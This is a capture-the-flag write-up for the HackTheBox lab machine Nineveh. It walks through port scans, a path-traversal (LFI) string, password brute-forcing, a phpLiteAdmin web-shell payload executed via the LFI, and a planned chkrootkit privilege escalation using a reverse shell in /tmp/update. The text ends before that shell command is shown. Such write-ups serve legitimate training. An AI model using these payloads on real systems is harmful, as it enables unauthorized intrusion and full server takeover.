โโโ(kali๐kali)-[~]
โโ$ sudo nmap -sC -sV -O 10.10.10.43
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
443/tcp open ssl/http Apache httpd 2.4.18 ((Ubuntu))
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=nineveh.htb/organizationName=HackTheBox Ltd/stateOrProvinceName=Athens/countryName=GR
| Not valid before: 2017-07-01T15:03:30
|_Not valid after: 2018-07-01T15:03:30
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
| tls-alpn:
|_ http/1.1
โโโ(kali๐kali)-[~]
โโ$ sudo nmap -sU -O 10.10.10.43
All 1000 scanned ports on 10.10.10.43 (10.10.10.43) are in ignored states.
โโโ(kali๐kali)-[~]
โโ$ sudo nmap -sC -sV -p- 10.10.10.43
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
| ssl-cert: Subject: commonName=nineveh.htb/organizationName=HackTheBox Ltd/stateOrProvinceName=Athens/countryName=GR
| Not valid before: 2017-07-01T15:03:30
|_Not valid after: 2018-07-01T15:03:30
|_ssl-date: TLS randomness does not represent time
|_http-title: 400 Bad Request
| tls-alpn:
|_ http/1.1
nmap shows only HTTP (TCP 80) and HTTPS (TCP 443) open:
โโโ(kali๐kali)-[~]
โโ$ nikto -h http://10.10.10.43
+ Server: Apache/2.4.18 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Server may leak inodes via ETags, header found with file /, inode: b2, size: 5535e4e04002a, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ OPTIONS: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS .
+ /info.php: Output from the phpinfo() function was found.
+ /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information. See: CWE-552
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /info.php?file=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8046 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time: 2023-12-29 22:56:25 (GMT-5) (2435 seconds)
I tried some basic password guessing, and noticed that the error messages were indicating if the user existed. For example, when I tried admin:
Invalid Password!
When I tried nineveh:
invalid username
Enumeration: Website - TCP 443
This is the same visiting by IP address or nineveh.htb.
phpLiteAdmin is a PHP interface for interacting with SQLite databases. Itโs version 1.9, which searchsploit shows there are exploits for:
https://www.phpliteadmin.org/
Examining each of these with searchsploit -x [path], the first is a version match and seems like a good way to get execution. The second also looks like it should work, if I want to do SQLi. The third one is not a version match, and the fourth has a bunch of less interesting vulnerabilities like XSS and CSRF. For all of them, I need to authenticate first.
Have you fixed the login page yet! hardcoded username and password is really bad idea!
check your serect folder to get in! figure it out! this is your challenge
Improve the db interface.
~amrois
None of it makes much sense at this point. They do mention a secret folder. Maybe weโll find that while enumerating port 443. One thing to notice is the URL that generates the page looks like a file path. When you see a file path, the first thing you should try is an LFI. I tried and it didnโt exactly work. When I try the following string
../../../../../../../etc/passwd
Iโm back to the โNo Note is selectedโ message. This leads me to believe that it is vulnerable to LFI, however, there is a check on the backend that is grepping for the string โninevehNotesโ since my query doesnโt work without it. According to the error, weโre in the /www/html/department/ directory, so we need to go three directories above. Letโs try with this string.
When it comes to LFIs, you usually need to chain it to another vulnerability in order to get remote code execution. Therefore, Iโm going to start enumerating the next port to see if I can find another vulnerability that I can chain this one to.
View the page source to see if it gives you any extra information. We donโt get anything useful. Next, view the SSL certificate.
admin@nineveh.htb
/secure_notes
This might be what the comment โcheck your secret folderโ was referring to. Save the image, it might have a secret stored in it. Weโll look into that later.
https://nineveh.htb/secure_notes/
I tried the default password โadminโ for phpLiteAdmin v1.9 but that did not work. Letโs try brute-forcing the password. First, intercept the request in Burp.
Letโs view the content of the Remote PHP Code Injection exploit. According to the comments made in the exploit, an attacker can create a sqlite database with a php extension and insert php code as text fields. When done, the attacker can execute it simply by accessing the database file using the browser.
This is exactly the vulnerability I was hoping to find! This vulnerability allows me to drop a malicious file on the server and the LFI vulnerability we found earlier allows me to call and execute my malicious file.
In the Create New Database section, create a new database called random.php. Then click on random.php in the Change Database section. There, create a new table called random with 1 field. In the Field parameter add the following code and change the Type to TEXT.
<?php echo system($_REQUEST ["cmd"]); ?>
Click Create. As mentioned in the below image, the file is created in the directory /var/tmp.
Now, letโs go back to the LFI vulnerability and execute our php code.
Weโre running as www-data, so we donโt have rights to read the file. We need to escalate our user privileges.
Priv: www-data โ> root
Letโs transfer the LinEnum script from our attack machine to the target machine. In the attack machine, start up a server in the same directory that the script resides in.
In our nmap scan, port 22 was not reported to be open, however, the LinEnum script reports it as listening on localhost. Iโm not sure what to do with this piece of information but Iโll keep it at the back of my mind in case I donโt find any other way to escalate privileges.
Next, letโs try pspy. If you donโt have the script, you can download it from the following github repository.
Every minute or so the chkrootkit is being run. Iโve never seen that on a machine before so I googled it and found out that it is a program intended to help system administrators check their system for known rootkits. Next, I googled โchkrootkit privilege escalationโ and landed on this
There is a privilege escalation vulnerability with old versions of this software that will run any executable file named /tmp/update as root. Therefore, all we have to do is create an โupdateโ file that contains a reverse shell and wait for the scheduled task to give us a shell with root privileges.
Iโll write a simple reverse shell to /tmp/update and make it executable:
